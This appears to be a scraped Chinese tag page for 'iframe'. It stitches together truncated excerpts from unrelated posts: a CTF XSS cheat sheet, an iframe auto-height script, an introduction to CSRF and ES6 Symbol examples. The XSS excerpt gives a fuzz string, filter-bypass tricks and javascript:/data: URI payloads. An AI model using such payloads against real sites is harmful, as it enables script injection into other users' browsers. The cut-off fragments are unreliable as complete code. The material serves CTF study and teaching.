iframe

CTF XSS

淺唱寂寞╮ 提交于 2020-01-17 21:28:55
CTF XSS 这一块接触的不多,这次先当搬运工,之后慢慢补上自己的东西 渗透流程 参考 XSS备忘录 fuzz "'<script javascript onload src><a href></a>#$%^ '";!-=#$%^&{()}<script javascript data onload href src img input><a href></a>alert(String.fromCharCode(88,83,83));prompt(1);confirm(1)</script> 绕过 标签之间 先闭合标签 JS标签内 空格被过滤: /**/ 输出注释中:换行符 %0a``%0d 字符串中 闭合引号、宽字节 文本属性中 把所有的payload转为HTML Markup,其实就是&#加ascii码 src/href/action/xlink:href/autofocus/content/data 等属性直接使用伪协议绕过 <a href=javascript:alert(2)>test</a> <a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgzKTwvc2NyaXB0Pg==>test</a> //<script>alert(3)</script> <svg><a xlink:href="javascript:alert

解决各种情况下的iframe高度自适应内容

萝らか妹 提交于 2020-01-17 20:28:00
JS自适应高度,其实就是设置iframe的高度,使其等于内嵌网页的高度,从而看不出来滚动条和嵌套痕迹。对于用户体验和网站美观起着重要作用。 如果内容是固定的,那么我们可以通过CSS来给它直接定义一个高度,同样可以实现上面的需求。当内容是未知或者是变化的时候。这个时候又有几种情况了。 iframe内容未知,高度可预测 这个时候,我们可以给它添加一个默认的CSS的min-height值,然后同时使用javascript改变高度。常用的兼容代码有: // document.domain = "caibaojian.com"; function setIframeHeight(iframe) { if (iframe) { var iframeWin = iframe.contentWindow || iframe.contentDocument.parentWindow; if (iframeWin.document.body) { iframe.height = iframeWin.document.documentElement.scrollHeight || iframeWin.document.body.scrollHeight; } } }; window.onload = function () { setIframeHeight(document

谨慎能捕千秋蝉(二)——CSRF

我怕爱的太早我们不能终老 提交于 2020-01-17 16:28:20
CSRF(Cross Site Request Forgery)跨站点请求伪造。 CSRF的本质是当重要操作的参数都能被攻击者预测到,才能成功伪造请求。 一、场景演示 下图是一个伪造请求的场景,按顺序来看; 1、2是正常登陆并产生Cookie,3、4是在登陆后访问骇客的网站并发请求,5是服务器执行骇客发出的请求。 这个场景的关键就是带上Cookie伪造请求。 1)浏览器中的Cookie 浏览器有“Session Cookie”(临时Cookie)和“Third-party Cookie”(本地Cookie); 前者浏览器关闭后就失效了,后者指定了Expire时间,只有超过了时间才会失效。 默认会拦截“Third-party Cookie”的有IE6、IE7、IE8、Safari; 不会拦截的有Firefox、Opera、Chrome等,我就验证了Firefox、Chrome、以及IE8。 2)验证浏览器的支持 设计两个域名“www.normal.net”(正常的网站)和“www.csrf.net”(伪造的网站) 1. 访问“ www.normal.net/cookie.php ”页面,在cookie.php中设置Cookie,用PHP代码实现。 <?php setcookie("cookie1",'session'); setcookie("cookie2",'third'

Youtube IFrame Player API - Disable Youtube auto resume video where I left off

百般思念 提交于 2020-01-17 10:58:12
问题 I'm using the Youtube IFrame Player API to play a video from Youtube. I want the video to be played from the beginning but Youtube automatically resume the video from where I last left off. Here is my code: new YT.Player('yt-player', { height: '439', width: '100%', videoId: 'my-video-id', startSeconds: 0, playerVars: { controls: 0, color: 'white', disablekb: 1, enablejsapi: 0, modestbranding: 1, rel: 0, showinfo: 1, iv_load_policy: 3, start: 0 }, events: { onReady: function() { this.playVideo

Javascript to insert IFRAME

廉价感情. 提交于 2020-01-17 08:47:39
问题 I'd like to give people the ability to insert a single Javascript line into their site which effectively allows me to insert an IFRAME of a fixed size that contains content from my site. It's effectively a widget which allows them to search my site or receive other information. Is this possible? 回答1: Yes, it is possible. You can use document.createElement("iframe") and then appendChild() or replaceChild() the new element =/ [if you use replaceChild, you define a dummy div that has the width

Why is my iframe video disappearing?

大兔子大兔子 提交于 2020-01-17 08:31:40
问题 I'm still a php beginner...I searched for someone with a coding issue like mine but could not find specifically what I was looking for. I apologize if somehow I missed an identical post somewhere. I have a php generated list of top 10 videos (listed by titles). The list (which is correctly ordered and is generated from a foreach loop) of titles is anchored per title to a sample video in a specific location of the html portion of the page, specifically in an iframe. When the user clicks on the

My iframe does not work with a UIWebView

我的未来我决定 提交于 2020-01-17 06:49:11
问题 I have tested my iframe everywhere and it works very well, but on iOS in Objective-C , it does not work on UIWebView , here is my code, can someone help me? Thanks self.webView.scrollView.scrollEnabled = NO; NSString *Str = [NSString stringWithFormat:@"<iframe frameborder=\"0\" width=\"359\" height=\"200\" src=\"//www.dailymotion.com/embed/video/%@\" allowfullscreen></iframe>", identifier]; [_webView loadHTMLString:Str baseURL:nil]; My iframe : <iframe frameborder="0" width="359" height="200"

Inserting a div element inside of an iframe

你离开我真会死。 提交于 2020-01-17 05:19:11
问题 I am trying to insert a div element inside of a iframe to which I would like to eventually apply a perfect scrollbar. As of now I have been able to insert the iframe inside div and apply perfect scrollbar to it. Any ideas? My code is as follows: <!DOCTYPE html> <html> <head> <title>perfect-scrollbar</title> <link href="http://noraesae.github.io/perfect-scrollbar/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://noraesae.github.io/perfect-scrollbar/perfect-scrollbar.min.css" rel

Using Jquery Fancybox auto height within an Iframe?

人走茶凉 提交于 2020-01-17 04:12:08
问题 I'm using Fancybox iframe form. form height 350px when finish form the result is just two lines. could any one tell me how to make auto height for the window my javascript code is $(document).ready(function() { $("#send_friend").fancybox({ 'width' : 310, 'height' : 350, 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe', 'showCloseButton' :false, 'padding' : 0, 'margin' : 0, 'transitionIn' : 'elastic', 'transitionOut' : 'elastic', 'overlayOpacity':'0.3',

ES6的Symbol

南笙酒味 提交于 2020-01-17 03:57:22
let s = Symbol(); alert(typeof(s)); // Symbol函数可以接受一个字符串作为参数,表示对 Symbol 实例的描述,主要是为了在控制台显示,或者转为字符串时,比较容易区分。 let s1 = Symbol('foo'); let s2 = Symbol('bar'); // s1 // Symbol(foo) // s2 // Symbol(bar) alert(s1.toString()); // "Symbol(foo)" alert(s2.toString()); // "Symbol(bar)" // s1和s2是两个 Symbol 值。如果不加参数,它们在控制台的输出都是Symbol(),不利于区分。有了参数以后,就等于为它们加上了描述,输出的时候就能够分清,到底是哪一个值。 // Symbol函数的参数只是表示对当前 Symbol 值的描述,因此相同参数的Symbol函数的返回值是不相等的。 // 没有参数的情况 // let s1 = Symbol(); // let s2 = Symbol(); // s1 === s2 // false // // 有参数的情况 // let s1 = Symbol('foo'); // let s2 = Symbol('foo'); // s1 === s2 // false //
订阅 iframe